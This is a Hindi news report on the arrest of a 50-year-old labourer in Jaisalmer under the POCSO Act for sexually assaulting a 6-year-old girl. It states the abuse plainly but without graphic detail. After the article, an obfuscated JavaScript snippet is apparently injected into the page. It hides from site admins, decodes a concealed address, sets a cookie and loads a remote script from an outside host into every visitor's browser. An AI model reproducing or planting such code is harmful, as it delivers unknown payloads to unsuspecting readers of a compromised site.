जैसलमेर – महिला थाना पुलिस ने आरोपी को गिरफ्तार किया।जैसलमेर में 6 साल की मासूम के साथ ज्यादती करने के आरोपी व्यक्ति को पुलिस ने गिरफ्तार किया। 50 साल के आरोपी पर महिला थाने में पॉक्सो (प्रोटेक्शन ऑफ़ चिल्ड्रन फ़्रॉम सेक्सुअल ऑफ़ेंस एक्ट) के तहत मामला दर्ज किया गया। पुलिस आरोपी से पूछताछ कर रही है। साथ ही 6 साल की मासूम का मेडिकल भी मेडिकल बोर्ड से करवाया।महिला थाना प्रभारी गीता विश्नोई ने बताया- गुरुवार को हुई इस घटना के तुरंत बाद आरोपी को पकड़ा गया था। परिजनों द्वारा शिकायत देने के बाद आरोपी मजदूर पर पॉक्सो एक्ट में बीएनएस के तहत अलग अलग धाराओं में मामला दर्ज कर लिया गया। मामले की जांच जारी है। फिलहाल पीड़ित मासूम का मेडिकल आदि करवाकर आरोपी से लगातार पूछताछ जारी है।
चॉकलेट का लालच देकर की गलत हरकत
गौरतलब है कि जैसलमेर शहर में गुरुवार को हुई एक घटना ने मानवता को शर्मसार कर दिया। शहर में 50 साल के एक बुजुर्ग मजदूर ने 6 साल की बच्ची के होंठो और प्राइवेट पार्ट को काट लिया। बच्ची के चिल्लाने पर बुजुर्ग फरार हो गया। लोगों ने उसे ढूंढकर उसकी पिटाई कर पुलिस को सौंप दिया। घटना की जानकारी मिलने पर महिला थाना पुलिस 6 साल की बच्ची का जवाहिर हॉस्पिटल में मेडिकल बोर्ड से मेडिकल करवाया। वहीं पुलिस ने रेप का प्रयास करने वाले बुजुर्ग को गिरफ्तार कर पॉक्सो के तहत मामला दर्ज किया।
बच्ची के चिल्लाने पर परिजनों ने संभाला
दरअसल, जैसलमेर शहर स्थित एक मोहल्ले में मकान का काम चल रहा है। उस मकान पर एक 50 साल का मजदूर मजदूरी कर रहा था। उसने पडो़स में ही खेल रही एक 6 साल की मासूम बच्ची को चॉकलेट का लालच दिया और निर्माणाधीन मकान की छत पर ले गया। वहां उसने बच्ची के होंठो और प्राइवेट पार्ट पर काटा। बच्ची जोर से चिल्लाई। बच्ची के चिल्लाने पर मजदूर मौके से भाग गया।बच्ची के चिल्लाने की आवाज सुनकर परिजन दौड़े और उससे पूछा। बच्ची ने सारा घटनाक्रम मां को बताया। गुस्साए लोगों ने मजदूर को ढूंढना शुरू किया। आखिरकार ठेकेदार को सूचना देकर मजदूर को पकड़ कर लाया गया। वहां लोगों ने उसकी जमकर धुनाई कर दी। किसी ने पुलिस को सूचना दी। पुलिस जैसे ही मौके पर आई लोगों ने उसे पुलिस के हवाले कर दिया।
(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();
